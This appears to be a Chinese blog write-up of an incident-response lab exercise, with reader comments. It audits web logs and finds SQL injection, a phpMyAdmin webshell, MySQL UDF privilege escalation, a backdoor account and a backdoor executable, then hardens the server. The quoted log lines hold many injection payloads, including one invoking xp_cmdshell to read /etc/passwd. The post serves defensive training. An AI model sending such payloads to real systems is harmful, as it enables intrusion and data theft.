快下班的时候开的容器,中间吃饭啥的断断续续的看了下就续了一次容器(金币:-40 O.o)
题目确实不难,巧的是刚好前几天就举办了攻防演练的入侵检测与溯源,刚好巩固学习了一下知识。详细内容可以看前两天发的一篇文章。

image-20221031144859374.png

image-20221031120938204.png

简单分析:

windows sever 2008直接远程连接就看到了日志页面,将日志down下来,进行日志审计
我记得刚开始是有几万行来着删除干扰项什么的,删掉一些无用的东西留下来的就不多了【使用正则表达式去筛选:^.\ 404.\r\n 类似的无用】
(下面的内容经过了部分解码后的结果):

27.211.48.24 - - [28/Oct/2022:15:58:28  0800] "GET /plus/heightsearch.php?id=1&pxQG=5478 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')# HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:29  0800] "GET /plus/heightsearch.php?id=1 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:30  0800] "GET /plus/heightsearch.php?id=2369 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:31  0800] "GET /plus/heightsearch.php?id=1.,).((.("' HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:33  0800] "GET /plus/heightsearch.php?id=1'MLEFkj<'">dHUPNQ HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:34  0800] "GET /plus/heightsearch.php?id=1) AND 5781=2799 AND (5691=5691 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:35  0800] "GET /plus/heightsearch.php?id=1 AND 3672=5261 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:36  0800] "GET /plus/heightsearch.php?id=1 AND 9767=3709-- zyNq HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:37  0800] "GET /plus/heightsearch.php?id=1') AND 9002=1777 AND ('brjY'='brjY HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:38  0800] "GET /plus/heightsearch.php?id=1' AND 7532=6334 AND 'vZrw'='vZrw HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:40  0800] "GET /plus/heightsearch.php?id=(SELECT (CASE WHEN (2459=2287) THEN 1 ELSE (SELECT 2287 UNION SELECT 4790) END)) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:41  0800] "GET /plus/heightsearch.php?id=1) AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271)) AND (3142=3142 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:42  0800] "GET /plus/heightsearch.php?id=1 AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271)) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:43  0800] "GET /plus/heightsearch.php?id=1 AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271))-- ITyG HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:44  0800] "GET /plus/heightsearch.php?id=1') AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271)) AND ('RzfU'='RzfU HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:45  0800] "GET /plus/heightsearch.php?id=1' AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271)) AND 'eana'='eana HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:46  0800] "GET /plus/heightsearch.php?id=1) AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC) AND (1441=1441 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:47  0800] "GET /plus/heightsearch.php?id=1 AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:48  0800] "GET /plus/heightsearch.php?id=1 AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC)-- xSlg HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:49  0800] "GET /plus/heightsearch.php?id=1') AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC) AND ('RaFv'='RaFv HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:50  0800] "GET /plus/heightsearch.php?id=1' AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC) AND 'dNIk'='dNIk HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:51  0800] "GET /plus/heightsearch.php?id=1) AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113))) AND (2092=2092 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:52  0800] "GET /plus/heightsearch.php?id=1 AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113))) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:54  0800] "GET /plus/heightsearch.php?id=1 AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113)))-- oAju HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:55  0800] "GET /plus/heightsearch.php?id=1') AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113))) AND ('QzDG'='QzDG HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:56  0800] "GET /plus/heightsearch.php?id=1' AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'phJm'='phJm HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:57  0800] "GET /plus/heightsearch.php?id=1) AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND (8197=8197 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:58  0800] "GET /plus/heightsearch.php?id=1 AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:59  0800] "GET /plus/heightsearch.php?id=1 AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)-- mkQK HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:00  0800] "GET /plus/heightsearch.php?id=1') AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND ('eGrM'='eGrM HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:01  0800] "GET /plus/heightsearch.php?id=1' AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||,CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'NDia'='NDia HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:02  0800] "GET /plus/heightsearch.php?id=(SELECT CONCAT(CONCAT('qzvxq',(CASE WHEN (5011=5011) THEN '1' ELSE '0' END)),'qzpbq')) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:03  0800] "GET /plus/heightsearch.php?id=1);SELECT PG_SLEEP(5)-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:05  0800] "GET /plus/heightsearch.php?id=1;SELECT PG_SLEEP(5)-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:06  0800] "GET /plus/heightsearch.php?id=1');SELECT PG_SLEEP(5)-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:07  0800] "GET /plus/heightsearch.php?id=1';SELECT PG_SLEEP(5)-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:08  0800] "GET /plus/heightsearch.php?id=1);WAITFOR DELAY '0:0:5'-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:09  0800] "GET /plus/heightsearch.php?id=1;WAITFOR DELAY '0:0:5'-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:10  0800] "GET /plus/heightsearch.php?id=1');WAITFOR DELAY '0:0:5'-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:11  0800] "GET /plus/heightsearch.php?id=1';WAITFOR DELAY '0:0:5'-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:12  0800] "GET /plus/heightsearch.php?id=1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(75)||CHR(65)||CHR(119),5) FROM DUAL-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:13  0800] "GET /plus/heightsearch.php?id=1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(75)||CHR(65)||CHR(119),5) FROM DUAL-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:14  0800] "GET /plus/heightsearch.php?id=1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(75)||CHR(65)||CHR(119),5) FROM DUAL-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:16  0800] "GET /plus/heightsearch.php?id=1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(75)||CHR(65)||CHR(119),5) FROM DUAL-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:17  0800] "GET /plus/heightsearch.php?id=1) AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) AND (4680=4680 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:18  0800] "GET /plus/heightsearch.php?id=1 AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:19  0800] "GET /plus/heightsearch.php?id=1 AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw)-- AOVF HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:20  0800] "GET /plus/heightsearch.php?id=1') AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) AND ('BomC'='BomC HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:21  0800] "GET /plus/heightsearch.php?id=1' AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) AND 'wPfG'='wPfG HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:22  0800] "GET /plus/heightsearch.php?id=1) AND 6299=(SELECT 6299 FROM PG_SLEEP(5)) AND (9547=9547 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:23  0800] "GET /plus/heightsearch.php?id=1 AND 6299=(SELECT 6299 FROM PG_SLEEP(5)) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:24  0800] "GET /plus/heightsearch.php?id=1 AND 6299=(SELECT 6299 FROM PG_SLEEP(5))-- LNPn HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:25  0800] "GET /plus/heightsearch.php?id=1') AND 6299=(SELECT 6299 FROM PG_SLEEP(5)) AND ('BFqo'='BFqo HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:26  0800] "GET /plus/heightsearch.php?id=1' AND 6299=(SELECT 6299 FROM PG_SLEEP(5)) AND 'POQt'='POQt HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:28  0800] "GET /plus/heightsearch.php?id=1) WAITFOR DELAY '0:0:5' AND (3312=3312 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:29  0800] "GET /plus/heightsearch.php?id=1 WAITFOR DELAY '0:0:5' HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:30  0800] "GET /plus/heightsearch.php?id=1 WAITFOR DELAY '0:0:5'-- GIsp HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:31  0800] "GET /plus/heightsearch.php?id=1') WAITFOR DELAY '0:0:5' AND ('GXdI'='GXdI HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:32  0800] "GET /plus/heightsearch.php?id=1' WAITFOR DELAY '0:0:5' AND 'cEsi'='cEsi HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:33  0800] "GET /plus/heightsearch.php?id=1) AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5) AND (4495=4495 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:34  0800] "GET /plus/heightsearch.php?id=1 AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:35  0800] "GET /plus/heightsearch.php?id=1 AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5)-- FkRl HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:36  0800] "GET /plus/heightsearch.php?id=1') AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5) AND ('uJJt'='uJJt HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:38  0800] "GET /plus/heightsearch.php?id=1' AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5) AND 'dXfX'='dXfX HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:46  0800] "GET /plus/heightsearch.php?id=1) ORDER BY 1-- kvLj HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:47  0800] "GET /plus/heightsearch.php?id=1) ORDER BY 5868-- laxD HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:48  0800] "GET /plus/heightsearch.php?id=1 ORDER BY 1-- iVOA HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:49  0800] "GET /plus/heightsearch.php?id=1 ORDER BY 9598-- nEAK HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:50  0800] "GET /plus/heightsearch.php?id=1 ORDER BY 1-- fsXM HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:51  0800] "GET /plus/heightsearch.php?id=1 ORDER BY 9394-- dkzK HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:52  0800] "GET /plus/heightsearch.php?id=1') ORDER BY 1-- bwKD HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:54  0800] "GET /plus/heightsearch.php?id=1') ORDER BY 6418-- CpUZ HTTP/1.1" 200 5899

可以很明显的看到,有sql注入,大概看了一下,没有细致去看
然后接下来看看题目:

提权方式(请输入黑客的提权方式(如有字母,请转换小写)):

这里很明显的看到一开始是用了mysql进行攻击,不过我是在后面看到文件才确定了是mysql的UDF提权;

image-20221031131124075.png

黑客的webshell(请删除黑客上传的webshell)

一般攻击都会写shell,查看日志看到这里有大量的POST请求,中途发现了一个GET请求访问了一个新文件,猜测是新写入的木马,进行查看发现确实是一个webshell,

27.211.48.24 - - [28/Oct/2022:16:12:33 +0800] "POST /phpmyadmin/db_sql_autocomplete.php HTTP/1.1" 200 2247
27.211.48.24 - - [28/Oct/2022:16:12:34 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:13:41 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:13:42 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 1705
27.211.48.24 - - [28/Oct/2022:16:14:01 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:14:02 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 2744
27.211.48.24 - - [28/Oct/2022:16:19:39 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 273
27.211.48.24 - - [28/Oct/2022:16:19:40 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 284
27.211.48.24 - - [28/Oct/2022:16:19:45 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 295
27.211.48.24 - - [28/Oct/2022:16:19:46 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 306
27.211.48.24 - - [28/Oct/2022:16:19:47 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 316
27.211.48.24 - - [28/Oct/2022:16:19:48 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 338
27.211.48.24 - - [28/Oct/2022:16:19:50 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 350
27.211.48.24 - - [28/Oct/2022:16:19:52 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 351
27.211.48.24 - - [28/Oct/2022:16:19:54 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 353
27.211.48.24 - - [28/Oct/2022:16:19:55 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 361
27.211.48.24 - - [28/Oct/2022:16:24:27 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 361
27.211.48.24 - - [28/Oct/2022:16:24:29 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 211
27.211.48.24 - - [28/Oct/2022:16:24:29 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 211
27.211.48.24 - - [28/Oct/2022:16:24:30 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 211
27.211.48.24 - - [28/Oct/2022:16:24:31 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 149
27.211.48.24 - - [28/Oct/2022:16:24:34 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:24:45 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 264
27.211.48.24 - - [28/Oct/2022:16:25:02 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 727
27.211.48.24 - - [28/Oct/2022:16:25:35 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 511
27.211.48.24 - - [28/Oct/2022:16:25:38 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 223
27.211.48.24 - - [28/Oct/2022:16:25:39 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 680
27.211.48.24 - - [28/Oct/2022:16:26:09 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 511
27.211.48.24 - - [28/Oct/2022:16:26:10 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 527
27.211.48.24 - - [28/Oct/2022:16:26:11 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 264
27.211.48.24 - - [28/Oct/2022:16:26:45 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:26:58 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3824
27.211.48.24 - - [28/Oct/2022:16:28:32 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:28:33 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 2775
27.211.48.24 - - [28/Oct/2022:16:29:15 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:35 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:37 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:38 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:39 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:40 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:41 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:42 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 13839
27.211.48.24 - - [28/Oct/2022:16:29:59 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 163
27.211.48.24 - - [28/Oct/2022:16:30:00 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 1760
27.211.48.24 - - [28/Oct/2022:16:30:12 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:13 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3360
27.211.48.24 - - [28/Oct/2022:16:30:21 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:22 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:23 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:25 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:27 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:28 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:30 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:31 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3406
27.211.48.24 - - [28/Oct/2022:16:31:44 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3399
27.211.48.24 - - [28/Oct/2022:16:32:04 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:32:06 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:32:07 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3413
27.211.48.24 - - [28/Oct/2022:16:36:27 +0800] "POST /phpmyadmin/index.php HTTP/1.1" 200 1306
27.211.48.24 - - [28/Oct/2022:16:42:27 +0800] "GET /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:43:06 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:43:09 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:43:28 +0800] "-" 408 -
27.211.48.24 - - [28/Oct/2022:16:45:10 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:45:13 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -

大概看一下就知道了木马是哪个,然后删除即可

image-20221031122009341.png

黑客的账号(请删除黑客添加的账号):

这里可以去看我上面的那篇文章了,这里也不知道他有没有进行隐藏操作,不过不管他有没有进行隐藏,使用
wmic useraccount get Name进行查看都是可以看到的,看到一个harry直接删了check,直接过了就

image-20221031122318451.png

后门木马(请输入黑客后门木马连接的服务器IP):

这个环境我不知道大家是怎么做的,由于前几天我们自己弄了一个相关的演练,而且本环境也允许的情况,直接下载一个火绒,跟一个D盾,扫描一下,有好有坏吧,他自动识别出来了进程里面的木马程序直接删了,直接后面chekc通过,但是里面的东西我还没看,这里我之后还浪费了几分钟去找,后面还是把文件恢复,再把火绒给退出才看到了:

image-20221031133500883.png

在system6.exe中发现了后门木马连接IP为:23.23.23.23:1996

加固服务器(设置服务器账号策略密码最小长度为8)

这个也比较简单了:

image-20221031132115757.png

更改后再更新一下策略:gpupdate /force

image-20221031132233731.png

删除木马(请杀死并删除黑客留下的后门木马):

将上面的进程终止删掉即可,或者使用火绒剑,一键清理(坏笑.jpg)

修复漏洞(请修复黑客提权利用的漏洞):

知道了漏洞是UDF提权后,修复这个漏洞还是比较简单的,但是由于自己操作问题,浪费了点时间
第一反应,--尴尬--|

image-20221031132826645.png

UDF提权需要已知mysql的用户名和密码,并且可以远程登录,我第一反应就是改了密码那么黑客不就不知道密码了吗?但是这样会让自己网站也无法正常运行,也就是需要进一步更改配置文件,而且这里也说了不要改账号密码,那么就要换一种思路了;

还需要mysql有写入文件权限,即secure_file_priv的值为空:
查看secure-file-priv特性

  secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。

  当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
  当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
  当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
  查看secure-file-priv参数的值:

image-20221031135256466.png

这里可以改成一个指定目录或者更改为NULL,

image-20221031135753261.png

这里下面我是把值改为了NULL,刚开始在尝试的时候在这最后一个花了点时间,修改完再重启服务check就OK了

标签: none

  1. xd xd

    除了bugku还有这种类型的靶场吗?

    1. bit bit

      有挺多的吧,春秋云镜啥的

  2. xd xd

    博主做什么方向的?

  3. 菜狗 菜狗

    师傅太厉害了,我昨天刚好做了一下这个题,今天就看到了师傅的文章,
    1.提权方式我不知道怎么判断,没做出来;
    2.webshell没找着,D盾,河马都找过了,没找着,最后我是直接把站删了然后就check过了,哈哈
    3.黑客账号删除harry
    4.后门连接ip我是用那个netstat -ano,然后把连接的IP一个一个试出来的
    5.加固服务器,正常操作
    6.删除木马,我是通过第四步的那个ip找到了对应的进程号,然后找到了后门文件system6.exe,给删了
    7.修复漏洞,不知道提权方式,也就不知道怎么修复,没做
    主要是这个环境里啥都没有,有些东西要临时下载,有点难受,日志看了半天也没找着什么东西,呜呜呜

    1. bit bit

      做的多了很多东西就会有“经验之谈了”,慢慢来
      1、根据sql目录下的udf文件就自然而然的能联想到udf提权;
      2、找webshell的话主要还是看日志,因为能免杀的马一抓一大把,有些靠那些软件找不到,看日志的话能更加清晰的知道他干了啥;
      3、删账号就没啥好说的了;
      4、最好的话还是知道为什么是这个;
      5、也是一个比较基础的操作;
      6、这样有理有据,挺不错的;
      7、第一个不知道那么这个自然会比较迷茫,是正常的,知道了他提权的手段后再针对性的对漏洞进行修复就比较容易了。
